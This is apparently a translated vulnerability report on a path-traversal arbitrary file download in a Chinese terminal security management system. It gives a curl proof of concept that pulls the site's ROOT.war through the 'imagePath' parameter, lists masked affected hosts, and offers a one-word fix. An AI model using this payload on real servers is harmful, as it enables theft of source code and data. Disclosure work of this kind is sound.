Software Terminal Security Management System File Download Vulnerability (one-click Download of the entire website)
Rt
Due to this vulnerability
Http: // **. **/bugs/wooyun-2015-0159690
Directly drop the keywords of the question (chinansoft unified terminal security management system) to dumb,
Check the source code, and the Arbitrary File Download Vulnerability is obvious ..
/Picture?imagePath=
Proof of vulnerability:
curl **.**.**.**:8080/Picture?imagePath=../server/default/deploy/ROOT.war > root.rar
Root.rar
The code of the entire website is downloaded like this ..
Attached several cases:
**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8443/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8443/**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8443/**.**.**.**:8443/
curl **.**.**.**:8080/Picture?imagePath=../server/default/deploy/ROOT.war > root.rar
Solution:
Filter